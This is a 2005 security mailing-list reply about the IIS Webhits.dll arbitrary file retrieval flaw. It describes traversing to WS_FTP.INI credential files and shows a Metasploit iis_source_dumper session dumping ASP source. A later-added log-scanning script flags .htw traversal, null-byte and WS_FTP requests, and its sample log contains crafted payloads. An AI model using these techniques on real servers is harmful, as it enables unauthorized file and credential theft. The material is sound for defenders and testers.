Re: Webhits.dll arbitrary file retrieval Vulnerability

From: H D Moore (sflist_at_digitaloffense.net)
Date: 03/04/05

    To: pen-test@securityfocus.com
    Date: Thu, 3 Mar 2005 17:42:05 -0600

    On Thursday 03 March 2005 01:25, Maverick The Techie wrote:
    > When I was doing a web server scan through Nikto on my website, it
    > reported that the files "/scripts/samples/search/qfullhit.htw" &
    > "/scripts/samples/search/qsumrhit.htw" are vulnerable to the
    > "Webhits.dll arbitrary file retrieval Vulnerability"

    There are two ways to exploit this; one uses an existing htw file, the
    other uses a non-existent file (these may actually be different issues --
    it's been forever since I have had to check).

    > Though I could not retrieve the SAM file hashes, I still got an HTTP
    > 200 OK message,

    > now Nikto also says that there is a "Ws_ftp.log" file
    > on the server, now I don't have any clue on this file and its location
    > on the server, some admins say that it contains the FTP user id and
    > encrypted password which is way easy to crack!!,

    This is incorrect. A ws_ftp.LOG file will give you a list of all files
    uploaded to the server, the source address of the client, and the local
    directory on the client. A ws_ftp.INI file contains the stored usernames
    and obfuscated passwords. Check each subdirectory on the web server for
    WS_FTP.LOG and you can discover the complete layout of the web site,
    which may include non-public, debugging, or administrative features.

    > now is there a way that I can access that log file through the above
    > vulnerability, or any other files for that matter coz whatever files I
    > have tried to access using the above way I have got nothing but HTTP
    > OK messages.

    Yes, you can use the webhits issue to traverse the file system and read
    arbitrary files. The default location of WS_FTP.INI is usually in the
    Program Files directory. Since this is a traversal vulnerability, this
    depends on Program Files being on the same drive as the web root (or
    virtual directory where the HTW file exists).

    > I request you all to kindly explain the method to exploit this bug and
    > access files, coz I am unable to exploit this vulnerability in a
    > proper way so unless I know how this bug is exploited.

    Browse the relevant OSVDB and SecurityFocus database entries and examine
    the source code to the attached Metasploit exploit module.

    msf iis_source_dumper > set RHOST 172.16.2.10
    RHOST -> 172.16.2.10
    msf iis_source_dumper > set RFILE /default.asp
    RFILE -> /default.asp
    msf iis_source_dumper > show targets

    Supported Exploit Targets
    =========================

       0 All Techniques
       1 Truncated HTR
       2 NTFS ::$DATA
       3 Translate: F
       4 Null HTW
       5 Codebrws.asp
       6 Sample HTW
       7 Dot Plus HTR
       8 MSADC Showcode
       9 IIS 4 Showcode

    msf iis_source_dumper > set TARGET 0
    TARGET -> 0
    msf iis_source_dumper > exploit
    [*] Attempting to use the 'Truncated HTR' technique...
    [*] Attempting to use the 'NTFS ::$DATA' technique...
    [*] Attempting to use the 'Translate: F' technique...
    [*] Attempting to use the 'Null HTW' technique...
    [*] Source code obtained via technique Null HTW
    HTTP/1.0 200 OK
    Content-Type: text/html

    <HTML>
    <HEAD>
    <TITLE>Query Results</TITLE>
    </HEAD>
    <H2>"none" in </H2>
    <H2>/default.asp </H2><HR>
    <BODY><a NAME="CiTag-1"> </a><h3> <font color="#FF0000"> << </font> takes
    you to the previous hit. <font color="#FF0000"> >> </font> takes you to
    the next hit.</b></h3>

    -HD
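As an added example (not part of the original thread), the following script applies the post's points from the server side: it scans IIS W3C log lines for requests to the two sample .htw search files Nikto reported, for .htw requests carrying traversal or null-byte sequences, and for requests to WS_FTP.LOG / WS_FTP.INI. The log lines and the field order (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C extended log sample, not a real capture. Field order assumed:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2005-03-03 17:40:01 192.0.2.10 GET /default.asp - 200
2005-03-03 17:40:05 192.0.2.77 GET /scripts/samples/search/qfullhit.htw - 200
2005-03-03 17:40:09 192.0.2.77 GET /nosuch.htw file=..%2F..%2Fsecret.txt%00 200
2005-03-03 17:40:12 192.0.2.77 GET /images/WS_FTP.LOG - 200
2005-03-03 17:40:20 192.0.2.88 GET /products/index.htm - 200
"""

# The two sample Index Server search pages named in the post.
SAMPLE_HTW = {"/scripts/samples/search/qfullhit.htw",
              "/scripts/samples/search/qsumrhit.htw"}
# WS_FTP artefacts the post describes (upload history / stored credentials).
WSFTP_FILES = {"ws_ftp.log", "ws_ftp.ini"}
# Directory traversal or an embedded null byte anywhere in the decoded request.
TRAVERSAL = re.compile(r"(\.\./|\.\.\\|\x00)")

def classify(line):
    """Return the findings for one log line ([] when nothing is suspicious)."""
    parts = line.split()
    if len(parts) < 7:
        return []
    stem, query, status = parts[4], parts[5], parts[6]
    # Decode twice so %252e-style double encoding is normalised as well.
    decoded = unquote(unquote(stem + "?" + query)).lower()
    path, _, _ = decoded.partition("?")
    findings = []
    if stem.lower() in SAMPLE_HTW:
        findings.append("sample .htw search page requested; remove the samples")
    if path.endswith(".htw") and TRAVERSAL.search(decoded):
        findings.append("Webhits-style traversal or null byte in .htw request")
    if path.rsplit("/", 1)[-1] in WSFTP_FILES:
        findings.append("WS_FTP log/ini requested; check web root for these files")
    if findings and status == "200":
        findings.append("server answered 200: verify whether content was served")
    return findings

def scan(log_text):
    """Map 1-based line numbers of suspicious requests to their findings."""
    return {n: f for n, line in enumerate(log_text.splitlines(), 1)
            if (f := classify(line))}

if __name__ == "__main__":
    for n, findings in scan(SAMPLE_LOG).items():
        print(f"line {n}: " + "; ".join(findings))
```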
